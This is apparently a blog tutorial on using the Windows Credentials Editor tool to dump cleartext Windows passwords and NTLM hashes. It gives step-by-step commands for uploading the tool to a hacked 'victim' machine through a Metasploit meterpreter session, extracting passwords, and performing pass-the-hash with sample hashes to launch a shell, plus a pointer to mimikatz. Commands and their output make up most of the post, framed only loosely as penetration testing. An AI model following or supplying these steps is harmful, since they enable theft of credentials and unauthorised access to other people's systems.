HOW TO GET WINDOWS PASSWORDS IN PLAIN TEXT

Windows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change, list and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing.
After hack remote computer upload wce to victim computer using metasploit
(1)Type following command in meterpreter session.
Upload /pentest/passwords/wce/wce.exe .
(2)Now type shell to get cmd of victim pc
(3)Type wce.exe -w to get password in clear text


List NTLM Credentials In Memory?


By default, WCE lists NTLM credentials in memory, no need to specify any options. 
For example: 
C:\Users\test>wce.exe

How To Change My Current NTLM Credentials?


wce.exe -s <username>:<domain>:<lmhash>:<nthash> 
For example: 
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser 
domain: amplialabs 
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE 
NTHash: 0CB6948805F797BF2A82807973B89537 
NTLM credentials successfully changed!



How To Create A New Logon Session And Launch A Program With New NTLM Credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program> 
For example: 
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe 


How To Generate NTLM Hashes With WCE? 

wce.exe -g <cleartext password> 
For example: 
C:\Users\test>wce.exe -g mypassword 
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) 
Use -h for help. 
Password: mypassword 
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 

If you want to know more about how its work , Download P.D.F. file from Below.
(1)P.D.F -1
(2)P.D.F.-2

If you only need clear text password not logon sessions and any other
you can use mimikatz to get clear text password.

1 comment:

  1. I think that you need to also check out this blog for some homework writing tips. I think that this could be a good start

    ReplyDelete